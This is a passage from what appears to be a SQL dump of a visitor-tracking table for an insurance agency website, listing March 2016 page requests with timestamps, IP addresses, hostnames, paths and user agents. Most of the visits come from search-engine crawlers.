667','','','','','','0','0',0),(6515,'0b_b047499761b27cad1c4b9e0f85707d57','1458328071','70.195.195.244','244.sub-70-195-195.myvzw.com','/register/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4','http://www.empireins.com/','',0,'iPhone OS','Safari 8 Mobile','us','375 x 667','','','','','','0','0',0),(6516,'0b_bbed2f3e4f6249d4643848b145a0183b','1458328634','40.84.159.73','40.84.159.73','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6519,'0b_bbed2f3e4f6249d4643848b145a0183b','1458328654','40.84.159.73','40.84.159.73','/about-us/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6522,'0b_bbed2f3e4f6249d4643848b145a0183b','1458328665','40.84.159.73','40.84.159.73','/contact/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6525,'0b_4a3216e181b6418c5634c42ee67f65aa','1458330133','198.50.200.139','198.50.200.139','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(6527,'0b_e2822aa3e73bc17bfbae3eb8a80036b0','1458330145','93.115.95.205','lh28409.voxility.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(6528,'0b_d109f4fd181fc56cbd16810908ffafb0','1458331865','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6530,'0b_8cd5bc622fa885c775cd61f849f44ec7','1458332685','66.249.73.194','crawl-66-249-73-194.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(6533,'0b_8cd5bc622fa885c775cd61f849f44ec7','1458332685','66.249.73.194','crawl-66-249-73-194.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(6536,'0b_8cd5bc622fa885c775cd61f849f44ec7','1458332686','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(6539,'0b_d6531e047ccf33a37e250b49f0d77b50','1458336239','52.6.229.204','ec2-52-6-229-204.compute-1.amazonaws.com','/','python-requests/2.9.1','','',0,'','','','','','python','','','','0','0',0),(6542,'0b_073cb107153ef65ef048d97eccdc1a4d','1458337187','46.4.87.105','static.105.87.4.46.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(6545,'0b_073cb107153ef65ef048d97eccdc1a4d','1458337190','46.4.87.105','static.105.87.4.46.clients.your-server.de','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(6548,'0b_073cb107153ef65ef048d97eccdc1a4d','1458337192','46.4.87.105','static.105.87.4.46.clients.your-server.de','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(6549,'0b_dbea607b5b3837fa5a12710da85c7c14','1458338240','66.249.73.169','crawl-66-249-73-169.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(6552,'0b_ec7a36892e230980670cfa30372af2b9','1458338607','89.248.172.201','89-248-172-201.constellationservers.net','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6555,'0b_52f783eddf437f773ec2e39ad36e5ee4','1458338826','71.84.38.106','webmail.theperfectbiteco.com','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=6&ved=0ahUKEwjV3fO0n8vLAhXMRyYKHQO4CKYQFgg-MAU&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg&bvm=bv.117218890,d.eWE','',0,'Win7 x64','IE 10','us','1366 x 768','','','','','','0','0',0),(6557,'0b_52f783eddf437f773ec2e39ad36e5ee4','1458338829','71.84.38.106','webmail.theperfectbiteco.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','us','1366 x 768','','','','','','0','0',0),(6560,'0b_52f783eddf437f773ec2e39ad36e5ee4','1458338840','71.84.38.106','webmail.theperfectbiteco.com','/contact/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','us','1366 x 768','','','','','','0','0',0),(6563,'0b_72de284e4c12886709f4af5a1568792b','1458341478','93.75.200.10','93-75-200-10-ptr.volia-lviv.com','/','','','',0,'','','us','','','Unknown Spider','','','','0','0',0),(6564,'0b_71c864a3f3ecde0524edfcba48a934cc','1458342094','207.46.13.148','msnbot-207-46-13-148.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(6567,'0b_71c864a3f3ecde0524edfcba48a934cc','1458342281','207.46.13.148','msnbot-207-46-13-148.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(6569,'0b_e5cdb59d296beb5f558db093dfe792e6','1458346703','40.77.167.17','msnbot-40-77-167-17.search.msn.com','/carriers/','msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6570,'0b_1d0a4086aac2434eb2bde7859f175a7c','1458349292','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6573,'0b_df0844dcbdacb2af7b0a9c9de3bdb0f0','1458356426','52.35.58.166','ec2-52-35-58-166.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6576,'0b_df0844dcbdacb2af7b0a9c9de3bdb0f0','1458356426','52.35.58.166','ec2-52-35-58-166.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6579,'0b_df0844dcbdacb2af7b0a9c9de3bdb0f0','1458356449','52.35.58.166','ec2-52-35-58-166.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(6582,'0b_df0844dcbdacb2af7b0a9c9de3bdb0f0','1458356510','52.35.58.166','ec2-52-35-58-166.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(6585,'0b_df0844dcbdacb2af7b0a9c9de3bdb0f0','1458356512','52.35.58.166','ec2-52-35-58-166.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(6588,'0b_2eb1b41817155250ddb3b2fed1f2a114','1458356642','66.249.73.187','crawl-66-249-73-187.googlebot.com','[404] /images/top-photo.jpg','Googlebot-Image/1.0','','',0,'','','','','','Googlebot','','','','0','0',0),(6590,'0b_d5d08f829efe40ae5886ad92d6f8b769','1458357030','69.30.218.234','intimidpad.com','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(6593,'0b_d5d08f829efe40ae5886ad92d6f8b769','1458357032','69.30.218.234','intimidpad.com','/top.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(6594,'0b_d5d08f829efe40ae5886ad92d6f8b769','1458357033','69.30.218.234','intimidpad.com','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(6596,'0b_d5d08f829efe40ae5886ad92d6f8b769','1458357035','69.30.218.234','intimidpad.com','/top.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(6599,'0b_d5d08f829efe40ae5886ad92d6f8b769','1458357037','69.30.218.234','intimidpad.com','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(6602,'0b_d5d08f829efe40ae5886ad92d6f8b769','1458357045','69.30.218.234','intimidpad.com','/illustration.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(6603,'0b_d5d08f829efe40ae5886ad92d6f8b769','1458357047','69.30.218.234','intimidpad.com','/products.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(6605,'0b_eda4f5015539857aa3ce03746ada8a41','1458358076','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(6606,'0b_658be56a48c2dcb38176b6a42887d554','1458358516','40.77.167.17','msnbot-40-77-167-17.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(6609,'0b_f1b48567f446cf22115f6a1fce8a3489','1458362275','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(6612,'0b_f1b48567f446cf22115f6a1fce8a3489','1458363385','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6615,'0b_9e3d61b0a1f5c82a9c2a8e4f42009fc9','1458364527','40.77.167.17','msnbot-40-77-167-17.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6618,'0b_e6d2462ddc4df8f5d4d70618027bc689','1458366969','207.46.13.131','msnbot-207-46-13-131.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6621,'0b_0fa23ac6f4d35ccb1072b362a06d102d','1458370585','66.249.73.202','crawl-66-249-73-202.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(6623,'0b_4c686aa20d978a87c8626c6fc0f90ee7','1458373539','68.180.229.164','b115306.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(6626,'0b_4c686aa20d978a87c8626c6fc0f90ee7','1458373540','68.180.229.164','b115306.yse.yahoo.net','/SSO/235_38.html','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(6629,'0b_6450205c589b37ffa35ea37758a64f6a','1458373541','68.180.229.91','b115355.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(6632,'0b_6450205c589b37ffa35ea37758a64f6a','1458373542','68.180.229.91','b115355.yse.yahoo.net','/SSO/235_38.html','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(6633,'0b_f7df63e432e866e1f3f2f4b772763fdd','1458377209','178.255.215.70','crawl06.exabot.com','/robots.txt','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(6635,'0b_f7df63e432e866e1f3f2f4b772763fdd','1458377210','178.255.215.70','crawl06.exabot.com','/calc.html','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(6636,'0b_f7df63e432e866e1f3f2f4b772763fdd','1458377217','178.255.215.70','crawl06.exabot.com','/robots.txt','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(6639,'0b_f7df63e432e866e1f3f2f4b772763fdd','1458377218','178.255.215.70','crawl06.exabot.com','/calc.html','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(6641,'0b_8722cc5aba416fa87c40dbe7f9af4f75','1458378597','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(6642,'0b_81aa5b7aca88e2e66f77a7eaecba9dce','1458378696','66.249.73.187','crawl-66-249-73-187.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(6644,'0b_ff03779ffd606029c8e66e399191b293','1458381886','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(6645,'0b_9dadf202d02fdd4e162c1cbcf0d2a737','1458382441','180.76.15.31','baiduspider-180-76-15-31.crawl.baidu.com','/licensing-contracting/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(6648,'0b_0886cc5839ffdafa894e6cb881696900','1458384866','208.115.111.66','208-115-111-66-reverse.wowrack.com','/meet-the-eib-team/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(6651,'0b_5ddf0faa943313a41504441f8403d2d8','1458389790','68.180.229.91','b115355.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(6654,'0b_5ddf0faa943313a41504441f8403d2d8','1458389792','68.180.229.91','b115355.yse.yahoo.net','/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(6657,'0b_df1cb741a9f2247af275808017950b35','1458391259','66.249.73.196','crawl-66-249-73-196.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(6659,'0b_9ff161d974a22fd8357c90780e10adc1','1458391261','207.46.13.149','msnbot-207-46-13-149.search.msn.com','/resources.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6662,'0b_df1cb741a9f2247af275808017950b35','1458391267','66.249.73.179','crawl-66-249-73-179.googlebot.com','/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(6665,'0b_d81b444bce85464b3f82a3188fc02b08','1458393017','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(6666,'0b_bb43ef149057fd7348a890d6681587e8','1458393221','141.8.143.242','spider-141-8-143-242.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(6668,'0b_bb43ef149057fd7348a890d6681587e8','1458393225','141.8.143.235','spider-141-8-143-235.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(6669,'0b_42ab1141aea110ed05cf84b51377d8ea','1458393225','100.43.81.146','spider-100-43-81-146.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(6671,'0b_876b83b28c39fe697d048c6ff0265c53','1458395777','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6674,'0b_876b83b28c39fe697d048c6ff0265c53','1458395778','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6677,'0b_876b83b28c39fe697d048c6ff0265c53','1458395781','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/register/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6680,'0b_876b83b28c39fe697d048c6ff0265c53','1458395783','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6683,'0b_876b83b28c39fe697d048c6ff0265c53','1458395784','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/insentives/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6684,'0b_876b83b28c39fe697d048c6ff0265c53','1458395785','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/licensing-contracting/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6687,'0b_876b83b28c39fe697d048c6ff0265c53','1458395787','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/agent-tools/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6689,'0b_876b83b28c39fe697d048c6ff0265c53','1458395788','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/carriers/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6690,'0b_876b83b28c39fe697d048c6ff0265c53','1458395790','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/contact/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6692,'0b_876b83b28c39fe697d048c6ff0265c53','1458395791','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/case-status/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6695,'0b_876b83b28c39fe697d048c6ff0265c53','1458395793','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/forms/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6696,'0b_876b83b28c39fe697d048c6ff0265c53','1458395797','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/igo/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6698,'0b_876b83b28c39fe697d048c6ff0265c53','1458395798','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/term-quotes/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6701,'0b_876b83b28c39fe697d048c6ff0265c53','1458395799','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6702,'0b_876b83b28c39fe697d048c6ff0265c53','1458395802','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6704,'0b_876b83b28c39fe697d048c6ff0265c53','1458395803','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6707,'0b_876b83b28c39fe697d048c6ff0265c53','1458395804','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6710,'0b_876b83b28c39fe697d048c6ff0265c53','1458395807','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/feed/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6713,'0b_876b83b28c39fe697d048c6ff0265c53','1458395808','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/comments/feed/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6714,'0b_876b83b28c39fe697d048c6ff0265c53','1458395810','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/home/feed/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6717,'0b_bafed1bbe886e2b914baf5d1b549e00b','1458396851','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6720,'0b_24fddb5a342479be1cec25d34b40a420','1458398088','180.76.15.156','baiduspider-180-76-15-156.crawl.baidu.com','/carriers/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(6722,'0b_9501f04f0a0464bb1488d8f808f0d76c','1458399188','208.115.111.66','208-115-111-66-reverse.wowrack.com','/carriers/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(6723,'0b_b3c4f73edacb3b84671df9afac8c814d','1458399688','207.46.13.149','msnbot-207-46-13-149.search.msn.com','/SSO/235_11.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6726,'0b_60e298f8e88faaca50cf00d73db4b175','1458399811','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(6728,'0b_60e298f8e88faaca50cf00d73db4b175','1458399813','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(6729,'0b_60e298f8e88faaca50cf00d73db4b175','1458399816','184.154.139.23','placeholder.sitelock.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(6731,'0b_60e298f8e88faaca50cf00d73db4b175','1458399818','184.154.139.23','placeholder.sitelock.com','/forms/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(6732,'0b_60e298f8e88faaca50cf00d73db4b175','1458399823','184.154.139.23','placeholder.sitelock.com','/carriers/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(6734,'0b_60e298f8e88faaca50cf00d73db4b175','1458399830','184.154.139.23','placeholder.sitelock.com','/igo/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(6735,'0b_60e298f8e88faaca50cf00d73db4b175','1458399832','184.154.139.23','placeholder.sitelock.com','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(6738,'0b_7dd283c90008b083b790a597e5ffd406','1458399834','52.33.28.148','ec2-52-33-28-148.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6741,'0b_7dd283c90008b083b790a597e5ffd406','1458399859','52.33.28.148','ec2-52-33-28-148.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(6744,'0b_7dd283c90008b083b790a597e5ffd406','1458399904','52.33.28.148','ec2-52-33-28-148.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(6746,'0b_7dd283c90008b083b790a597e5ffd406','1458399904','52.33.28.148','ec2-52-33-28-148.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(6747,'0b_bd86ef7871feb5bc860cb5dc5907fba5','1458400491','69.30.221.250','latestdirect.com','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; 